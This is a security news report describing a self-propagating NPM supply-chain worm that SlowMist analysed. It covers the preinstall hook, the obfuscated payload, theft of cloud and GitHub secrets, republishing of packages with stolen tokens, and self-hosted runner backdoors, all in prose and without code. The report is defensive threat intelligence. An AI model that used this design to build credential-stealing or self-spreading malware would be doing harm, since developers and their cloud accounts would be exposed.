The NPM ecosystem has been targeted by a sophisticated supply chain attack with direct connections to the September 2025 Shai-Hulud incident. Malicious packages have been discovered containing code designed to exfiltrate developer credentials, API keys, and environment variables, subsequently using stolen authentication tokens to create public repositories containing the compromised data. Security firm SlowMist’s Web3 threat intelligence platform MistEye detected the campaign and promptly issued security alerts to protect affected customers. The malicious packages were immediately quarantined and their SHA-256 hashes documented for identification purposes. Technical analysis reveals the attack methodology employed by packages such as @asyncapi/php-template@0.1.1, which introduced two new JavaScript files—setup_bun.js and an obfuscated bun_environment.js—compared to the legitimate version 0.1.0. The package.json file was modified to include a preinstall script that automatically executes setup_bun.js during dependency installation. The attack chain begins with setup_bun.js checking for Bun runtime installation, automatically downloading it if absent, and subsequently executing the obfuscated bun_environment.js. Deobfuscation reveals the malicious script performs comprehensive environment reconnaissance, detecting NPM and GitHub credentials before initiating credential theft operations. The malware systematically targets cloud service credentials across multiple platforms: – AWS: Implements methods to traverse all accessible cloud credentials across regions, extracting all SecretString and SecretBinary data – GCP: Enumerates and retrieves all secrets within specified projects, accessing the latest versions of each secret – Azure: Scans subscriptions for Key Vaults and extracts all contained secrets Notably, the attackers weaponize legitimate security tools, including TruffleHog, to scan victims’ entire file systems for additional credentials. The attack incorporates self-propagating capabilities through an updatePackage() function that uses stolen NPM tokens to download legitimate packages, inject malicious preinstall scripts, increment version numbers, and republish the compromised packages to the registry. For command and control, the malware leverages stolen GitHub tokens to create repositories with randomly generated names, registering victims’ machines as self-hosted GitHub Actions runners. This enables remote code execution through malicious workflow triggers. Exfiltrated data undergoes double base64 encoding before being uploaded to repositories bearing the description “Sha1-Hulud: The Second Coming.” Security researchers characterize this campaign as combining worm-like propagation with long-term persistence through self-hosted runners, augmented by the weaponization of security scanning tools. SlowMist recommends developers implement dependency version locking strategies and conduct thorough security reviews before updating packages to mitigate similar supply chain risks. Organizations seeking enhanced protection against APT campaigns and dependency poisoning can leverage specialized Web3 threat intelligence solutions for rapid threat detection and mitigation.